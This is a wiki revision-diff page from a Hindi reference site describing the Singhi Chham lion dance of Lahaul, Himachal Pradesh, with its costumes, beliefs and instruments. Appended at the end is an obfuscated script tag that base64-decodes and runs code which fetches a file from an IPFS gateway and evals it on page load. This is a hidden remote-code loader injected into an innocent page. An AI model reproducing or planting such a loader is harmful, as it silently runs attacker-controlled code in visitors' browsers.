Difference between revisions of "सिंघी छम नृत्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
Line 1: Line 1:
*[[भारत]] में प्रचलित कुछ प्रमुख [[शास्त्रीय नृत्य]] शैलियों में से एक सिंघी छम नृत्य है।
+
[[चित्र:Singhi-Cham-Dance.jpg|thumb|250px|सिंघी छम नृत्य]]
*सिंघी छम नृत्य को सिंह नृत्य भी कहा जाता है।
+
'''सिंघी छम नृत्य''' [[भारत]] में प्रचलित कुछ प्रमुख [[शास्त्रीय नृत्य]] शैलियों में से एक है। सिंघी छम नृत्य को सिंह नृत्य भी कहा जाता है।
 
*सिंघी छम नृत्य [[हिमाचल प्रदेश]] का लाहौल जनपद में किया जाता है, जो [[तिब्बत]] की सीमाओं से लगा है।   
 
*सिंघी छम नृत्य [[हिमाचल प्रदेश]] का लाहौल जनपद में किया जाता है, जो [[तिब्बत]] की सीमाओं से लगा है।   
 
*सिंघी छम नृत्य में लामा लोग सिंह का वेश धारण कर पारंपरिक लोक वाद्यों की ताल पर नृत्य करते हैं।  
 
*सिंघी छम नृत्य में लामा लोग सिंह का वेश धारण कर पारंपरिक लोक वाद्यों की ताल पर नृत्य करते हैं।  
 
*इसमें यह धारणा है कि विकट रूप धारण करने से दुष्ट आत्माएँ तंग नहीं करती हैं।  
 
*इसमें यह धारणा है कि विकट रूप धारण करने से दुष्ट आत्माएँ तंग नहीं करती हैं।  
 
*इसमें बजने वाले [[वाद्य यंत्र]] [[ढोल]], बुगजाल, [[बांसुरी]] है।
 
*इसमें बजने वाले [[वाद्य यंत्र]] [[ढोल]], बुगजाल, [[बांसुरी]] है।
{{प्रचार}}
+
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 13: Line 13:
 
|शोध=
 
|शोध=
 
}}
 
}}
{{संदर्भ ग्रंथ}}
+
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 11:15, 9 July 2012

thumb|250px|sianghi chham nrity sianghi chham nrity bharat mean prachalit kuchh pramukh shastriy nrity shailiyoan mean se ek hai. sianghi chham nrity ko sianh nrity bhi kaha jata hai.

  • sianghi chham nrity himachal pradesh ka lahaul janapad mean kiya jata hai, jo tibbat ki simaoan se laga hai.
  • sianghi chham nrity mean lama log sianh ka vesh dharan kar paranparik lok vadyoan ki tal par nrity karate haian.
  • isamean yah dharana hai ki vikat roop dharan karane se dusht atmaean tang nahian karati haian.
  • isamean bajane vale vady yantr dhol, bugajal, baansuri hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>